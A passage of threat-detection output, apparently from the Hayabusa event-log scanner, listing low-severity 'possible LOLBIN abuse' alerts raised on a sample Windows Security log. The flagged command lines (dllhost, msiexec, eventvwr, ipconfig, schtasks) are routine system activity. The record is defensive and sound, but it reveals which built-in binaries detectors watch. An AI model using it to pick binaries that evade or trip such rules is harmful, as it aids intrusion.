8672016-09-03 00:12:39.433 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8682016-09-03 00:12:39.445 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8692016-09-03 00:12:39.484 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8702016-09-03 00:14:02.255 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8712016-09-03 00:14:02.270 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8722016-09-03 00:53:11.002 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8732016-09-03 01:40:58.690 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8742016-09-03 01:41:25.835 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8752016-09-03 03:18:00.297 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\powershell5.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8762016-09-03 03:18:00.345 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8772016-09-03 03:18:00.364 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8782016-09-03 03:18:00.383 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\511-evtx\powershell5.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8792016-09-03 03:18:00.420 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\511-evtx\powershell5.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8802016-09-03 04:22:52.366 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8812016-09-03 04:25:19.159 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8822016-09-03 04:25:27.075 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8832016-09-03 06:16:47.905 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8842016-09-03 06:24:11.171 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8852016-09-03 06:24:11.188 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8862016-09-03 23:42:26.898 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8872016-09-03 23:42:26.947 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8882016-09-03 23:42:27.427 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8892016-09-03 23:42:27.571 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8902016-09-03 23:42:27.649 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8912016-09-03 23:42:47.904 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8922016-09-03 23:42:48.029 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8932016-09-03 23:42:49.005 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8942016-09-03 23:43:24.078 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8952016-09-03 23:43:24.155 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8962016-09-03 23:43:50.397 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8972016-09-03 23:43:50.481 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8982016-09-03 23:43:53.494 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
8992016-09-03 23:45:17.009 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9002016-09-03 23:45:17.120 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9012016-09-03 23:45:55.086 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9022016-09-03 23:45:55.181 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9032016-09-03 23:46:29.971 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9042016-09-03 23:46:30.076 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9052016-09-03 23:47:06.223 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9062016-09-03 23:47:06.332 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9072016-09-03 23:47:41.359 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9082016-09-03 23:47:42.736 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9092016-09-03 23:48:23.665 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9102016-09-03 23:48:23.826 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9112016-09-03 23:48:46.838 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9122016-09-03 23:48:47.001 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9132016-09-03 23:49:56.148 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9142016-09-03 23:49:56.315 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9152016-09-03 23:49:59.727 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9162016-09-03 23:51:03.843 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9172016-09-03 23:51:03.998 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9182016-09-03 23:51:11.414 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9192016-09-03 23:51:11.583 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9202016-09-03 23:51:23.151 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9212016-09-03 23:51:23.337 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9222016-09-03 23:51:37.272 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9232016-09-03 23:51:37.462 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9242016-09-03 23:52:34.610 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9252016-09-03 23:52:34.820 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9262016-09-03 23:53:22.275 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9272016-09-03 23:53:22.491 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
